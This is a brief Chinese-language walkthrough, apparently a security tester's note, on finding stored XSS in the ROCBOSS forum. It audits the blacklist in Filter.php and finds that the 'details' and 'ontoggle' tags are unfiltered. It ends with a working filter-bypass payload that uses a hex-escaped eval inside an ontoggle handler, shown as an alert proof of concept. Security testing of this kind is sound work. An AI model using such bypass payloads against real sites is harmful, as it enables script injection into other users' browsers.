
*****
## 存儲型XSS測試
### 環境搭建
1.下載ROCBOSS:https://www.rocboss.com/
2.按照文檔進行安裝
### 定向挖掘XSS漏洞
XSS漏洞可以存在于個人資料出,文章發表處或者留言評論處
### 黑名單審計
私信位置沒有被實體化,可以進行XSS,但是被黑名單過濾
查看system\\util\\Filter.php文件
沒有過濾details和ontaggle
### 繞過過濾,觸發XSS
~~~
"><details open ontoggle=eval("\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert('xss')")><"
~~~